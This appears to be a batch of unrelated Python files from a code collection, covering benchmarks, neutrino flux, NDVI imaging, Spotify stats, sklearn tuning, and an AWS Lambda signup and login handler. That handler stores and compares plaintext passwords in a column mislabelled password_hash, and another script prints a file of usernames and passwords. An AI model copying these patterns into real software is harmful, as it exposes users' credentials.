res['reference_date'] = res['reference'].name.strftime("%Y.%m.%d")
res['check'] = str(check)
if res['latest_better'] is not None and res['earliest_notworse'] is not None:
r1 = res['latest_better']['revision']
r2 = res['earliest_notworse']['revision']
# how many commits are in between
ndiff = len(results[res['latest_better'].name:
res['earliest_notworse'].name])-1
diff = '%(r1)s...%(r2)s' % locals()
diff_ = '(>=%(ndiff)d)%(diff)s' % locals() if ndiff > 1 else diff
res['source_diff'] = \
('`%(diff_)s <%(gh_repo)s/compare/%(diff)s>`__'
if gh_repo else "%(diff_)s" ) % locals()
else:
res['source_diff'] = 'N/A'
all_res.append(res)
if res:
# sort all by the slowdown_percent showing the slowest first
all_res = sorted(all_res, key=lambda x:x['slowdown_percent'], reverse=True)
print >> f, """
.. container:: benchmarks_analysis clear
.. list-table::
:header-rows: 1
:stub-columns: 1
:widths: 32 30 6 4 4 4 20
* - Benchmark
- Check
- Slowdown %
- Reference date
- Reference timing
- Target timing
- Possible recent"""
for res in all_res:
print >> f, """\
* - %(benchmark)s
- %(check)s
- %(slowdown_percent).1f
- %(reference_date)s
- %(reference_timing).2g
- %(target_timing).2g
- %(source_diff)s""" % res
|
991,153 | 023c892f00e17858e2733331e65de0d579abbf7d | #!/usr/bin/env python3
from mine import process, play
def assertEqual(x, y):
try:
assert x == y
except AssertionError:
print("{} != {}".format(x, y))
raise
def test1():
with open("13_mine_cart/test_input.txt", 'r') as f:
track = [[x for x in line if x!="\n"] for line in f]
first_crash = play(*process(track), part1_only=True)
assertEqual(first_crash, (3, 7))
def test2():
with open("13_mine_cart/test_input2.txt", 'r') as f:
track = [[x for x in line if x!="\n"] for line in f]
_, carts = play(*process(track))
assertEqual(carts[0][0], (4, 6))
test1()
test2()
|
991,154 | 35f0f78898b7a8a246c443847e82d2e12941eb9d | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
mullvad.py
Check if you're connected to Mullvad VPN
"""
import sys
import requests
import json
def main():
"""docstring for main"""
try:
r = requests.get('https://am.i.mullvad.net/json')
json_data = r.json()
if json_data['mullvad_exit_ip']:
print("You are connected to Mullvad!")
else:
print("You are NOT connected to Mullvad!")
if 'json' in sys.argv:
# for k, v in json_data.items():
# print("{key}: {value}".format(key=k, value=v))
print(json.dumps(json_data, indent=2))
else:
print("IP: {}".format(json_data['ip']))
print("Country: {}".format(json_data['country']))
if json_data['city'] is not None:
print("City: {}".format(json_data['city']))
except Exception as e:
print(e)
if __name__ == '__main__':
main()
|
991,155 | 91d20e32e547a9be94861b4fec07802836c7a9ca | from collections import Counter
class Check:
def __init__(self, dataset, cldf):
self.dataset = dataset
self.cldf = cldf
self.errors = []
def check(self):
pass
class CheckNotEmpty(Check):
"""Check if a given column in the CLDF file is all empty"""
table = 'LanguageTable'
def check(self):
nonempty = Counter()
for row in self.cldf[self.table]:
nonempty.update([k for k in row if row[k] != ""])
for k in row:
if nonempty.get(k, 0) == 1:
self.errors.append("Empty column %s in table %s" % (k, self.table))
return len(self.errors) == 0 |
991,156 | 53e19f1aa65a2c4362b47bd9083d7f179d6cf53a | # ReactorTools.py
#
# Some tools for calculating the neutrino rate from a nuclear reactor.
#
# Adam Anderson
# 14 April 2016
# adama@fnal.gov
#
# Note: Convention on units:
# --all masses are in kg
# --all energies are in keV
import numpy as np
import scipy.interpolate as interp
import ROOT
def nuFlux(power, distance):
'''
Computes the total flux per fission of reactor antineutrinos at a given
distance from the core, assuming a point-like flux, and nominal neutrino production
Parameters
----------
power : float
Reactor power in MW
distance : float
Distance in cm from reactor core at which flux is to be calculated
Returns
-------
flux : float
The reactor neutrino flux in fissions/s/cm^2
'''
# Assume 200 MeV per fission
flux = power/200.0/1.602176565e-19 / (4*np.pi * distance**2.)
return flux
# Setup for the huber spectra
huber_setup_complete = False
huber_spl_loc = "data_files/interpolations/"
spl_U235 = 0
spl_Pu239 = 0
spl_Pu241 = 0
def spl_U235_eval(): return
def spl_Pu239_eval(): return
def spl_Pu241_eval(): return
def Huber_setup(file_U235=huber_spl_loc+'U235-anti-neutrino-flux-250keV.dat',
file_Pu239=huber_spl_loc+'Pu239-anti-neutrino-flux-250keV.dat',
file_Pu241=huber_spl_loc+'Pu241-anti-neutrino-flux-250keV.dat'):
global huber_setup_complete
global interp_min, interp_max
global spl_U235, spl_Pu239, spl_Pu241
global spl_U235_eval, spl_Pu239_eval, spl_Pu241_eval
# U235
enU235, specU235 = np.loadtxt(file_U235,usecols=(0,1),unpack=True)
spl_U235_eval = interp.interp1d(x=enU235, y=specU235,
bounds_error=False,
fill_value=(specU235[0],specU235[-1]))
# Pu239
enPu239, specPu239 = np.loadtxt(file_Pu239,usecols=(0,1),unpack=True)
spl_Pu239_eval = interp.interp1d(x=enPu239, y=specPu239,
bounds_error=False,
fill_value=(specPu239[0],specPu239[-1]))
# Pu241
enPu241, specPu241 = np.loadtxt(file_Pu241,usecols=(0,1),unpack=True)
spl_Pu241_eval = interp.interp1d(x=enPu241, y=specPu241,
bounds_error=False,
fill_value=(specPu241[0],specPu241[-1]))
huber_setup_complete = True
return
def dRdEnu_U235(Enu):
# check global setup
global huber_setup_complete
global spl_U235_eval
if(not huber_setup_complete):
Huber_setup()
if type(Enu) == float:
Enu = np.asarray([Enu])
else:
Enu = np.asarray(Enu)
# input is in keV, huber spline expects MeV
# huber spline gives results in 1/Mev/fission, we want 1/keV/fission
spec = spl_U235_eval(Enu*1e-3)*1e-3
spec[Enu<2.e3] = spl_U235_eval(2.0)*1e-3
spec[spec<0] = 0
return spec
def dRdEnu_Pu239(Enu):
# check global setup
global huber_setup_complete
global spl_Pu239_eval
if(not huber_setup_complete):
Huber_setup()
if type(Enu) == float:
Enu = np.asarray([Enu])
else:
Enu = np.asarray(Enu)
# input is in keV, huber spline expects MeV
# huber spline gives results in 1/Mev/fission, we want 1/keV/fission
spec = spl_Pu239_eval(Enu*1e-3)*1e-3
spec[Enu<2.e3] = spl_Pu239_eval(2.0)*1e-3
spec[spec<0] = 0
return spec
def dRdEnu_Pu241(Enu):
# check global setup
global huber_setup_complete
global spl_Pu241_eval
if(not huber_setup_complete):
Huber_setup()
if type(Enu) == float:
Enu = np.asarray([Enu])
else:
Enu = np.asarray(Enu)
# input is in keV, huber spline expects MeV
# huber spline gives results in 1/Mev/fission, we want 1/keV/fission
spec = spl_Pu241_eval(Enu*1e-3)*1e-3
spec[Enu<2.e3] = spl_Pu241_eval(2.0)*1e-3
spec[spec<0] = 0
return spec
# The fit from Mueller is used for U-238
def dRdEnu_U238(Enu):
'''
Reactor anti neutrino spectrum from U238 (see arXiv:1101.2663v3), per
fission
Parameters
----------
Enu : array
Neutrino energy in keV
Returns
-------
spectrum : array
Spectrum [nu / keV / fission]
'''
if type(Enu) == float:
Enu = np.asarray([Enu])
else:
Enu = np.asarray(Enu)
EnuMeV = Enu / 1.e3
spectrum = 1e-3 * np.exp((4.833e-1) + (1.927e-1)*EnuMeV - (1.283e-1)*EnuMeV**2.0 - \
(6.762e-3)*EnuMeV**3.0 + (2.233e-3)*EnuMeV**4.0 - (1.536e-4)*EnuMeV**5.0)
#spectrum[EnuMeV<1.0] = 1e-3 * np.exp((4.833e-1) + (1.927e-1)*1.0 - (1.283e-1)*1.0**2.0 - \
# (6.762e-3)*1.0**3.0 + (2.233e-3)*1.0**4.0 - (1.536e-4)*1.0**5.0)
return spectrum
|
991,157 | 9b762de425648c02f0606e2669034a475db28790 | import csv
import re
dir='/home/dgc7/ejersiciosLibros/pyaton/ejemplos/scrapin/zlibrari/descargarLIbros/descargarparte1/contraseñasYcorreos.txt'
data=open(dir,'r+')
usuario=[]
contraseña=[]
for i in range(0,200):
if i%2==0 :
usuario.append(data.readline())
if i%2 !=0:
contraseña.append(data.readline())
for i in range (0,100):
print(usuario[i])
print(contraseña[i]) |
991,158 | 5c6cd69805339080e5ae5d10df6cd631c56196bc |
from download_binary_lib import download_binary_libs, BinaryLibDescription
# Disclaimer: This script is called by qmake or CMake. It is not necessary to call it manually.
# Same as download_external_libs but only for qt.
download_binary_libs([BinaryLibDescription("qt", "qt.zip", "https://meshes.mailbase.info/libs/qt.zip")])
|
991,159 | e19c41e4fde0d7a1e53ec2a81af6eb796a2a33b4 | import re
import string
#applies a few simple regex rules to clean up the data
def proc(data):
for i,d in enumerate(data):
data[i]=re.sub("<.*?>"," ",data[i]) # remove html tags like : <br />
data[i]=re.sub("[0-9]+"," ",data[i]) # remove numbers
# we want to keep the sentence structure
#..................................don't remove ?!. replace ?/! with .
#this part exludes ?!.from the list of punctuations
punctuation = '['+re.escape(re.sub('[?!\\.]','',string.punctuation))+']'
data[i]=re.sub(punctuation,' ',data[i])
data[i]=re.sub("\s+"," ",data[i])# remove multiple spaces
|
991,160 | 708580f1479d51743b16aee3a2caf3b00cdb29be | # source https://www.geeksforgeeks.org/python-program-for-quicksort/
def partition(arr, low, high):
i = (low-1) # index of smaller element
pivot = arr[high] # pivot
for j in range(low, high):
# If current element is smaller than or
# equal to pivot
if arr[j] <= pivot:
# increment index of smaller element
i = i+1
arr[i], arr[j] = arr[j], arr[i]
arr[i+1], arr[high] = arr[high], arr[i+1]
return (i+1)
# The main function that implements QuickSort
# arr[] --> Array to be sorted,
# low --> Starting index,
# high --> Ending index
# Function to do Quick sort
def quickSort(arr, low, high):
if len(arr) == 1:
return arr
if low < high:
# pi is partitioning index, arr[p] is now
# at right place
pi = partition(arr, low, high)
# Separately sort elements before
# partition and after partition
quickSort(arr, low, pi-1)
quickSort(arr, pi+1, high)
# https://www.geeksforgeeks.org/minimum-difference-max-min-k-size-subsets/
def minDifferenceAmongMaxMin(arr, N, K):
# initialize result by a
# big integer number
res = 2147483647
# loop over first (N - K) elements
# of the array only
for i in range((N - K) + 1):
# get difference between max and min
# of current K-sized segment
curSeqDiff = arr[i + K - 1] - arr[i]
res = min(res, curSeqDiff)
return res
T = int(input())
for _ in range(T):
N,K= map(int, input().split(" "))
arr = list(map(int, input().split(" ")))
if K < 2:
print("0")
else:
quickSort(arr, 0, N-1)
if K == N:
print(arr[N-1] - arr[0])
else:
print(minDifferenceAmongMaxMin(arr, N, K)) |
991,161 | 20d25e6ded87a7c543186fe9695fba7328eaa701 | #!/usr/bin/python
import os
import subprocess
import time
class webServerInstance():
def __init__(self,port,currentDir):
self.port = port
self.currentDir = currentDir
self.process = None
def startProcess(self):
cmd = [self.currentDir+"/tax_assessor.py","--port="+str(self.port)]
self.process = subprocess.Popen(cmd,universal_newlines=True)
def terminateProcess(self):
self.process.terminate()
if __name__ == "__main__":
ports = [8000,8001,8002,8003]
webServers = []
currentDir = os.path.dirname(os.path.realpath(__file__))
for port in ports:
webServer = webServerInstance(port,currentDir)
webServer.startProcess()
webServers.append(webServer)
while True:
cmd = raw_input()
if cmd.lower() == "exit":
for webServer in webServers:
webServer.terminateProcess()
break
|
991,162 | 57a655e1e0403c21703df78355d44776a7e9f49b | import spotipy
import sys
import spotipy.util as util
import webbrowser
import matplotlib.pyplot as plt
import simplejson as json
import pandas as pd
scope = 'user-top-read'
TopArtistList = []
TopArtistDict = []
ArtistCount = []
continueloop = True
if len(sys.argv) > 1:
username = sys.argv[1]
else:
print("Usage: %s username" % (sys.argv[0]))
sys.exit()
print("Welcome to Who Do You Love Listening To")
print("Term choices:")
print("1. Long Term")
print("2. Medium Term")
print("3. Short Term")
while(continueloop == True):
choice = input("Enter your choice:")
if choice == '1':
term = "long_term"
continueloop = False
if choice == '2':
term = "medium_term"
continueloop = False
if choice == '3':
term = "short_term"
continueloop = False
else:
print("invalid")
token = util.prompt_for_user_token(username, scope, client_id='XXXXXXXXXXXXXXXX', client_secret='XXXXXXXXXXXXXXXXXX', redirect_uri='http://google.com/')
if token:
sp = spotipy.Spotify(auth=token)
results = sp.current_user_top_tracks(time_range=term, limit=25)
print("Your Top 25 Songs Are:")
for item in results['items']:
print(item['name'] + ' // ' + item['artists'][0]['name'])
itemstr = item['artists'][0]['name']
TopArtistList.append(itemstr)
else:
print("could not acquire token for", username)
artistseries = pd.Series(TopArtistList)
artistseries = artistseries.value_counts()
artistseries.plot.bar(color='#1DB954',edgecolor='black')
plt.xlabel('Artists', fontsize = 18)
plt.ylabel('# of songs listened', fontsize=16)
plt.savefig("YourFavoriteArtists.png", bbox_inches='tight', dpi=100)
print("A graph has been generated and saved in the project folder...") |
991,163 | 4964830b4ee747f35121ad327555b15c1ff9a7c9 | import json
import boto3
import uuid
import pymysql
import os
import hashlib
def lambda_handler(event, context):
# TODO implement
# print(event)
path = event.get("path")
items = json.loads(event.get("body"))
print(path, items)
mydb = pymysql.connect(
host= os.environ["hostname"],
user=os.environ["username"],
password=os.environ["password"],
db = "notes"
)
if path == "/signup":
id = uuid.uuid4().urn[9:]
email = items.get("email")
name = items.get("full_name")
password = items.get("password")
curr = mydb.cursor()
sql = f"INSERT INTO users (uuid, email, name, password_hash) VALUES (%s, %s, %s, %s)"
response = curr.execute(sql, (id, email, name, password))
mydb.commit()
mydb.close()
return {
'statusCode': 200,
'headers' : {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': '*'
},
'body': json.dumps({
'message': "Success",
'userId': id,
'email' : email,
'full_name' : name
})
}
elif path == "/login":
email = items.get("email")
password = items.get("password")
curr = mydb.cursor()
sql = f"Select * from users where email=%s and password_hash=%s"
count = curr.execute(sql, (email, password))
print(count)
if count == 0:
return {
'statusCode': 200,
'headers' : {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': '*'
},
'body': json.dumps({
'message': 'Failure'
})
}
rows = curr.fetchall()
column = [t[0] for t in curr.description]
item = {}
for row in rows:
for i in range(len(row)-1):
item[column[i]] = row[i]
mydb.close()
return {
'statusCode': 200,
'headers' : {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': '*'
},
'body': json.dumps({
'message': "Success",
'userId': item.get("uuid"),
'email' : item.get("email"),
'full_name' : item.get("name")
})
}
|
991,164 | dc74d218e84736bd87287fa3baf7bc0b06187b55 | from pessoa import Pessoa
p1 = Pessoa('Luiz', 44)
p2 = Pessoa('Otavio', 32)
p1.comer('nhoque')
p1.pararComer()
p1.pararComer()
p1.comer('banana')
|
991,165 | 06414b1d83f9fb3f4e619a2ea2d00bb4798a2184 | class Node:
def __init__(self):
self.level = None
self.gain = 0
self.value = None
self.split_attribute = None
self.cutting_point = None
self.leaf_value = None
self.children = None
self.most_popular_child = None
|
991,166 | e2155ff087b8d4d7823fd05f98b5f44eb58d7579 | def search(p,s):
if p in s:
return(1)
return(0) |
991,167 | e860c50b551b2b57b496351a849b3a41933b8ee8 | from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
sex = models.CharField(max_length=5, blank=False)
subdivision = models.CharField(max_length=30, blank=False)
birth_date = models.DateField(null=True, blank=False)
position = models.CharField(max_length=30, blank=False)
experience = models.FloatField(blank=False, default='0.0')
shift = models.CharField(max_length=30, blank=False)
part_time_job = models.CharField(max_length=30, blank=False)
group = models.CharField(max_length=30, blank=False)
lateness = models.TimeField(max_length=30, blank=False) |
991,168 | 83fcb7517dc8f0aac695c7195fb428dcb22485a8 | import os
import gym
import numpy as np
from datetime import datetime
from stable_baselines3 import PPO
def load_render(folder, timesteps=1000, render=True):
''' Loads a previously trained agent and runs it,
generating a trace.
Each trace in 'traces' be a pair. Trace[0] will have an ordered
list of (state_index, action) pairs, and trace[1] will have an
ordered list of states, where states[state_index] is the full
state image. IMPORTANT action is the incoming edge for state_index,
not outgoing.
folder (String) : The date subfolder in training_results
containing the agent to load
timesteps (int) : The number of timesteps for each trace (Default
1000)
render (bool) : Wether or not to render the agent while running
trace. False will result in faster trace generation but will not
generate real image states.
'''
# load the best agent model
best_model_save_dir = 'training_results/{}/best_model/'.format(folder)
best_model = PPO.load(best_model_save_dir + 'best_model')
# Save action and image for each state
images = {}
actions = []
trace_pairs = []
env_id = 'LunarLander-v2'
env = gym.make(env_id)
obs = env.reset()
# This line sometimes throws an error stemming from pyglet, unsure why:
# site-packages/pyglet/canvas/base.py, line 106, in get_default_screen
# return self.get_screens()[0]
# IndexError: list index out of range
img = env.render(mode='rgb_array') if render else None
frame_count = timesteps
for i in range(frame_count):
images[i] = img
action, _states = best_model.predict(obs)
actions.append(action)
obs, rewards, dones, info = env.step(action)
img = env.render(mode='rgb_array') if render else None
images[frame_count] = img
trace_pairs.append((0, -1)) # no action to get to initial image
for i in range(len(actions)):
trace_pairs.append((i+1, actions[i]))
trace = (trace_pairs, images)
return trace
if __name__ == "__main__":
pass |
991,169 | 15fbeafd6998860876a4503f8fe194a9f68bd579 | # Reverse Strings
# The goal is to write a fn that takes a input(string) and returns the reversed strings
"""
Reverse the input string
Args:
our_string(string): String to be reversed
Returns:
string: The reversed string
"""
def string_reverser(string):
reversed_string = ''
for letter in range(len(string)-1, -1, -1):
reversed_string += string[letter]
return reversed_string
# Test Cases
print ("Pass" if ('retaw' == string_reverser('water')) else "Fail")
print ("Pass" if ('!noitalupinam gnirts gnicitcarP' == string_reverser('Practicing string manipulation!')) else "Fail")
print ("Pass" if ('3432 :si edoc esuoh ehT' == string_reverser('The house code is: 2343')) else "Fail")
# Anagrams
# The goal of this exercise is to write some code to determine if two strings are anagrams of each other.
# An anagram is a word (or phrase) that is formed by rearranging the letters of another word (or phrase).
# For example:
# "rat" is an anagram of "art"
# "alert" is an anagram of "alter"
# "Slot machines" is an anagram of "Cash lost in me"
# Your function should take two strings as input and return True if the two words are anagrams and False if they are not.
# You can assume the following about the input strings:
# No punctuation
# No numbers
# No special characters
# Code
def anagram_checker(str1, str2):
# Method 1 starts*********************
# str1 = sorted(str1.replace(" ","").lower())
# str2 = sorted(str2.replace(" ","").lower())
# if str1 == str2:
# return True
# return False
# Method 1 ends***********************
# Method 2 starts*********************
str1 = str1.lower().replace(" ","")
str2 = str2.lower().replace(" ","")
obj = {}
for letter in str1:
if letter not in obj:
obj[letter] = 1
else:
obj[letter] += 1
for letter in str2:
if letter in obj.keys():
if obj[letter] != str2.count(letter):
return False
else:
return False
return True
# Method 2 ends*************************
# Test Cases
print ("Pass" if not (anagram_checker('water','waiter')) else "Fail")
print ("Pass" if anagram_checker('Dormitory','Dirty room') else "Fail")
print ("Pass" if anagram_checker('Slot machines', 'Cash lost in me') else "Fail")
print ("Pass" if not (anagram_checker('A gentleman','Elegant men')) else "Fail")
print ("Pass" if anagram_checker('Time and tide wait for no man','Notified madman into water') else "Fail")
|
991,170 | c299ebba4f4c1d053949e8ded3bd6ccd21fa1efb | from kaiju import RobotGridCalib
from kaiju.utils import plotOne
import numpy
def test_gfaCollision(plot=False):
rg = RobotGridCalib()
for alphaAng in numpy.linspace(0, 360, 100): #[0, 60, 120, 180, 240, 300, 360]:
for r in rg.robotDict.values():
r.setAlphaBeta(alphaAng, 0)
# assert rg.getNCollisions() == 6
if plot:
plotOne(0, rg, "gfa%i_collide.png"%alphaAng, False)
rg.decollideGrid()
assert rg.getNCollisions() == 0
if plot:
plotOne(0, rg, "gfa%i_decollide.png"%alphaAng, False)
if __name__ == "__main__":
test_gfaCollision(plot=True) |
991,171 | 139b32186dc719f9f5d32c995925328ca7bf37e6 | # -*- encoding: utf-8 -*-
"""
@File : 859-亲密字符串.py
@Time : 2023/08/03 14:46:30
@Author : TYUT ltf
@Version : v1.0
@Contact : 18235121656@163.com
@License : (C)Copyright 2020-2030, GNU General Public License
"""
# here put the import lib
"""
给你两个字符串 s 和 goal ,只要我们可以通过交换 s 中的两个字母得到与 goal 相等的结果,就返回 true ;否则返回 false 。
交换字母的定义是:取两个下标 i 和 j (下标从 0 开始)且满足 i != j ,接着交换 s[i] 和 s[j] 处的字符。
例如,在 "abcd" 中交换下标 0 和下标 2 的元素可以生成 "cbad" 。
示例 1:
输入:s = "ab", goal = "ba"
输出:true
解释:你可以交换 s[0] = 'a' 和 s[1] = 'b' 生成 "ba",此时 s 和 goal 相等。
示例 2:
输入:s = "ab", goal = "ab"
输出:false
解释:你只能交换 s[0] = 'a' 和 s[1] = 'b' 生成 "ba",此时 s 和 goal 不相等。
示例 3:
输入:s = "aa", goal = "aa"
输出:true
解释:你可以交换 s[0] = 'a' 和 s[1] = 'a' 生成 "aa",此时 s 和 goal 相等。
提示:
1 <= s.length, goal.length <= 2 * 104
s 和 goal 由小写英文字母组成
"""
"""
返回true情况: 大条件:len(A) == len(B) 一:有两个不同地方(i,j),且A[i]=B[j],A[j]=B[i] 二:完全相同,一个数组中存在重复数字
"""
class Solution:
def buddyStrings(self, A: str, B: str) -> bool:
index = []
if len(A) == len(B):
for i in range(len(A)):
if A[i] != B[i]:
index.append(i)
if (
len(index) == 2
and A[index[0]] == B[index[1]]
and A[index[1]] == B[index[0]]
):
return True
if len(index) == 0 and len(A) - len(set(A)) > 0:
return True
return False
obj = Solution()
s = "ab"
goal = "ba"
print(obj.buddyStrings(s, goal))
|
991,172 | 02e17ef530c2feb1d016e36710ce8dbb3db9dd09 | #!/usr/bin/env python3
""" This file parses a histogram CSV file generated via get_utxo_histogram.py. """
import sys
import argparse
import pandas as pd
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('folder', type=str, help='Folder holding all snapshot chunks')
argparser.add_argument('snapshot_height', type=int, help='Block height of the snapshot to extract')
argparser.add_argument('--prefix', type=str, help='Prefix of output file', default='utxo_hist_')
args = argparser.parse_args()
with open(f'{args.folder}/{args.prefix}{args.snapshot_height:010d}_histogram.csv', 'r') as f_histogram:
data = pd.read_csv(f_histogram, sep=';')
res = dict()
res['chunk_height'] = args.snapshot_height
for column in data:
if column in ['chunk_height', 'chunk_offset']:
continue
res[column] = data[column].sum()
data_out = pd.DataFrame(res, index=['absolute']).drop('chunk_height', axis=1).transpose()
total_utxos = data_out.sum(axis=0)[0]
print(str(total_utxos))
data_out['relative'] = (100. * data_out['absolute']) / (1. * total_utxos)
print(str(data_out))
|
991,173 | fcccf1d3434081955ab2ab6f6a32d43056dd4f5a | for _ in range(int(input())):
n,d=map(int,input().split())
a=list(map(int,input().split()))
a.sort()
if a[-1]<=d:
print('YES')
elif a[0]+a[1]<=d:
print('YES')
else:print('NO') |
991,174 | dfb889458e93f94b9385aa559ae9d45cce68a974 | # -*- coding: utf-8 -*-
import pandas as pd
from PIL import Image, ImageMath, ImageStat
import numpy as np
import requests
import logging # Used to make streaming silent
import io
import json
from itertools import compress
import matplotlib.pyplot as plt
# Streams an image and calculate live stats from the image
# Bands 1-5 correspond to the following names
bands = ['blue','green','red','nir','rededge']
save_bands = [True, True, True, True, False]
xOffset = [0, 0, 0, 0, 0]
yOffset = [0, 0, 0, 0, 0]
host = "http://192.168.1.83"
# Calculate the decimal equivalent of the save_codes
# This wil be used for image capture
save_code = 0
for i in range(0,len(bands)):
save_code += 2**i * save_bands[i]
# Define parameters for camera configuration (this is permanently stored)
config_payload = {'streaming_enable' : False,
'timer_period' : 1.0,
'auto_cap_mode' : 'disabled',
'enabled_bands_raw' : 0, # This doesn't affect RAM stored previews
'enabled_bands_jpeg' : save_code # This doesn't affect RAM stored previews
}
c = requests.post(host + '/config', data=config_payload)
print(c.text)
# Get camera software version
v = requests.get(host + '/version')
print(v.text)
# Define arguments to control image capture
payload = {'preview' : False, # This doesn't seem to affect the downloaded image
'block' : True,
'store_capture' : False,
'cache_jpeg' : save_code,
'cache_raw' : 0}
# Tell the camera to capture data and save in its RAM
r = requests.get(host + '/capture', params=payload, stream=True)
nFile = sum(save_bands)
bandNames = list(compress(bands, save_bands))
# Download images from the camera's RAM to a file as a jpeg
# This works and produces an image that is 215kBytes
npim = np.empty((500,500,nFile))
for i in range(0,nFile):
# file = list(r.json()['jpeg_cache_path'].values())[i]
file = list(r.json()['jpeg_cache_path'].values())[i]
rf = requests.get(host + file, stream=True)
outfile = 'rededge_{0}.jpg'.format(bands[i])
with open(outfile, 'wb') as f:
for chunk in rf.iter_content(10240):
f.write(chunk)
# # Read byte stream and display image
# #images.append(Image.open(io.BytesIO(rf.content)))
# tmp = Image.open(io.BytesIO(rf.content))
# filename = 'image_raw_{}.bmp'.format(bandNames[i])
# tmp.save(filename)
# Read files
red = Image.open('rededge_red.jpg')
green = Image.open('rededge_green.jpg')
blue = Image.open('rededge_blue.jpg')
nir = Image.open('rededge_nir.jpg')
# Resize image
width,height = red.size # Find size of image
# Offsets, order is blue, green, red, nir
# These are good offsets for 2m away
xOffset = [32,10,34,45] # +ve moves image to right
yOffset = [0,8,32,25] # +ve moves image down
base = [200,200]
red_crop = red.crop((base[0]-xOffset[2],
base[1]-yOffset[2],
width-xOffset[2],
height-yOffset[2]))
green_crop = green.crop((base[0]-xOffset[1],
base[1]-yOffset[1],
width-xOffset[1],
height-yOffset[1]))
blue_crop = blue.crop((base[0]-xOffset[0],
base[1]-yOffset[0],
width-xOffset[0],
height-yOffset[0]))
nir_crop = nir.crop((base[0]-xOffset[3],
base[1]-yOffset[3],
width-xOffset[3],
height-yOffset[3]))
# Check alignment by creating an RGB image
rgb = Image.merge('RGB',(red_crop,green_crop,blue_crop))
rgb.show()
# Normalise red and nir
red_np = np.asarray(red_crop).astype(float)
nir_np = np.asarray(nir_crop).astype(float)
# Calculate the NDVI
ndvi = (nir_np - red_np) / (nir_np+red_np)
# Display image
tmp = Image.fromarray(ndvi*255)
tmp.show()
plt.imshow(ndvi)
plt.show()
# Make ndvi into a pandas dataframe
ndvi_flat = ndvi.flatten(order='F')
shape = ndvi.shape
x,y = np.unravel_index(np.arange(shape[0]*shape[1]), shape)
ndvi_pd = pd.DataFrame([('x', x),('y',y),('pixel',ndvi_flat)])
# Plot
|
991,175 | 283004b13cc2e21911c81e83f776c8a3ec8f1051 | import pandas as pd
import numpy as np
from pprint import pprint
from time import time
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.pipeline import Pipeline
from sklearn.base import BaseEstimator
#from textblob import TextBlob
df = pd.read_csv('sentiment_target.csv',engine = 'python')
df.dropna(inplace = True)
df.reset_index(drop = True,inplace = True)
x = df.text
y = df.sentiment
random_state = 42
x_train,x_test_validation,y_train,y_test_validation = train_test_split(x,y,test_size = 0.02,random_state = random_state)
x_validation,x_test,y_validation,y_test = train_test_split(x_test_validation,y_test_validation,test_size = 0.5,random_state = random_state)
class ClfSwitcher(BaseEstimator):
def __init__(self, estimator = LogisticRegression()):
"""
A Custom BaseEstimator that can switch between classifiers.
:param estimator: sklearn object - The classifier
"""
self.estimator = estimator
def fit(self, X, y=None, **kwargs):
self.estimator.fit(X, y)
return self
def predict(self, X, y=None):
return self.estimator.predict(X)
def predict_proba(self, X):
return self.estimator.predict_proba(X)
def score(self, X, y):
return self.estimator.score(X, y)
pipeline = Pipeline([
('vect', CountVectorizer()),
('tfidf', TfidfTransformer()),
('clf', ClfSwitcher()),
])
feature_range = np.arange(5000,20001,5000)
iter_range = [4000]
log_parameters = {
'vect__max_df': [0.5, 0.75, 1.0],
'vect__max_features': feature_range,
'vect__ngram_range': [(1, 1), (1, 2),(1,3)], # unigrams or bigrams,trigram
'tfidf__use_idf': [True, False],
'tfidf__norm': ['l1', 'l2'],
'clf__estimator' : [LogisticRegression()],
'clf__estimator__penalty': ['l1','l2'],
'clf__estimator__max_iter': iter_range,
'clf__estimator__solver':['saga']
}
sdg_parameter = {
'vect__max_df': [0.5, 0.75, 1.0],
'vect__max_features': feature_range,
'vect__ngram_range': [(1, 1), (1, 2),(1,3)], # unigrams or bigrams,trigram
'tfidf__use_idf': [True, False],
'tfidf__norm': ['l1', 'l2'],
'clf__estimator': [SGDClassifier()], # SVM if hinge loss / logreg if log loss
'clf__estimator__penalty': ['l2', 'elasticnet', 'l1'],
'clf__estimator__max_iter': iter_range,
'clf__estimator__tol': [1e-4],
'clf__estimator__loss': ['hinge', 'log', 'modified_huber'],
}
all_parameters = [log_parameters,sdg_parameter]
best_scores_list = []
best_parameters_list = []
if __name__ == "__main__":
for parameters in all_parameters:
grid_search = GridSearchCV(pipeline, parameters, n_jobs=-1, verbose=1,cv = 5)
print("Performing grid search...")
print("pipeline:", [name for name, _ in pipeline.steps])
print("parameters:")
pprint(parameters)
t0 = time()
grid_search.fit(x_train, y_train)
y_pred = grid_search.predict(x_test)
print("done in %0.3fs" % (time() - t0))
print()
print("Model score with the best model parameters: %0.3f" % grid_search.score(y_pred,y_test))
best_scores_list.append(grid_search.best_score_)
print("Best parameters set:")
best_parameters = grid_search.best_estimator_.get_params()
best_parameters_list.append(best_parameters)
for param_name in sorted(parameters.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
print(best_scores_list,best_parameters_list) |
991,176 | 25bc5ab782634e27dcb4022e1f8a0661bc310ea8 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2020/11/30 21:09
# @Author : Yong
# @Email : Yong_GJ@163.com
# @File : set_up.py
# @Software: PyCharm
# set_up()
# 如果在TestCase 类中包含了方法setUp() ,Python将先运行它,
# 再运行各个以test_打头的方法。
# set_up() 在此类中的作用
# 1、创建一个调查对象
# 2、创建一个答案列表
# 运行测试用例时,每完成一个单元测试,Python都打印一个字符:
# 测试通过时打印一个句点;
# 测试引发错误时打印一个E ;
# 测试导致断言失败时打印一个F 。
# 这就是你运行测试用例时,在输出的第一行中看到的句点和字符数量各不相同的原因。
# 如果测试用例包含很多单元测试,需要运行很长时间,就可通过观察这些结果 来获悉有多少个测试通过了。
import unittest
